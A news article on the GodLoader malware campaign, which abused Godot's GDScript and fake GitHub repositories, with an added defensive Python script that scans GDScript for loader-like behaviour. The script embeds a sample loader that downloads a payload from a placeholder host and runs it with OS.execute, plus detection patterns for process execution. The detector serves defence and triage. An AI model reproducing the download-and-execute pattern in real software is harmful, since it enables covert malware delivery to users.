Hackers spread GodLoader malware via the Godot game exploit

December 3, 2024

Threat actors have abused the Godot game engine to bypass security detection and launch a new malware loader, GodLoader. According to reports, the campaign has already infected at least 17,000 devices in three months.

Researchers explained that the attacks compromised thousands of devices quickly because the loader can target gamers on all major platforms, including Windows, macOS, Linux, Android, and iOS.

Moreover, the campaign takes advantage of Godot's flexibility and its GDScript scripting language to run arbitrary code, evading detection systems by embedding the malicious scripts in content loaded by the game engine itself.

The GodLoader malware operation used its malicious code to harvest information on infected devices.

According to investigations, the GodLoader malware executes its malicious code once loaded on a victim's device. The loader enables the threat actors to steal passwords or download additional payloads, such as the XMRig cryptocurrency miner.

Since June, hackers have allegedly used the Godot Engine to execute crafted GDScript code that triggers harmful commands and delivers malware. These activities have evaded various AV tools, potentially impacting thousands of devices in just a few months.
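To illustrate the defender's side of the behaviour described above (GDScript used to fetch and run further payloads), here is an added static triage script that is not from the article or from the researchers it cites. It scans GDScript sources for the engine capabilities such a loader needs and scores each file. The API names (OS.execute, OS.create_process, OS.shell_open, HTTPRequest, FileAccess.open) are real Godot 4 GDScript APIs; the sample scripts, indicator weights and alert threshold are constructed assumptions.

```python
import re

# Constructed sample GDScript sources (not from the article). The first is
# ordinary game logic; the second has the shape of a download-and-run loader.
SAMPLE_SCRIPTS = {
    "res://player.gd": """
extends CharacterBody2D
func _physics_process(delta):
    velocity = Input.get_vector("left", "right", "up", "down") * 200
    move_and_slide()
""",
    "res://boot.gd": """
extends Node
func _ready():
    var http = HTTPRequest.new()
    add_child(http)
    http.request("http://example.invalid/stage2.bin")
    var f = FileAccess.open("user://stage2.bin", FileAccess.WRITE)
    OS.execute("stage2.bin", [])
""",
}

# Real Godot 4 GDScript APIs that plain gameplay code rarely needs, each with
# an assumed weight: one hit is a note, a combination crosses the alert line.
INDICATORS = {
    r"\bOS\.execute\(": ("process execution", 3),
    r"\bOS\.create_process\(": ("process execution", 3),
    r"\bOS\.shell_open\(": ("launches external program/URL", 1),
    r"\bHTTPRequest\b": ("outbound HTTP", 1),
    r"\bFileAccess\.open\(\s*\"user://": ("writes to user data dir", 1),
}

def triage_script(source):
    # Return (score, reasons) for one GDScript source string.
    reasons, score = [], 0
    for pattern, (label, weight) in INDICATORS.items():
        hits = len(re.findall(pattern, source))
        if hits:
            reasons.append(f"{label} x{hits}")
            score += weight * hits
    return score, reasons

def triage_project(scripts, alert_threshold=4):
    # Triage a {path: source} map; return only the scripts that reach the threshold.
    flagged = {}
    for path, src in scripts.items():
        score, reasons = triage_script(src)
        if score >= alert_threshold:
            flagged[path] = (score, reasons)
    return flagged
```

This is a lightweight source-level heuristic for reviewing the scripts of a downloaded project before running it; it is easy to evade and is a triage aid, not a substitute for sandboxing the game.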

Furthermore, the potential reach of these incidents is significant, as Godot has an active and growing developer community that values its open-source nature and powerful features.

Over 2,700 developers have contributed to the Godot game engine, which has about 80,000 followers across several platforms, including Discord and YouTube. The researchers also found that the malicious actors distributed the GodLoader malware via the Stargazers Ghost Network.

This network is a malware distribution-as-a-service (DaaS) that hides its actions behind seemingly legitimate GitHub projects.

Between September and October 2024, the hackers used over 200 repositories managed by over 225 Stargazer Ghost accounts to deliver malware to targets' devices, capitalising on potential victims' trust in open-source platforms and seemingly legitimate software repositories.

Over the last couple of months, researchers have detected four separate attacks targeting developers and gamers, all of which enticed them to download infected tools and games.

Therefore, individuals in these communities should be aware of such emerging threats and avoid downloading trending software without verifying its source. Users should be more cautious about acquiring products from open-source platforms, as some threat actors have infiltrated them to distribute their malicious tools.
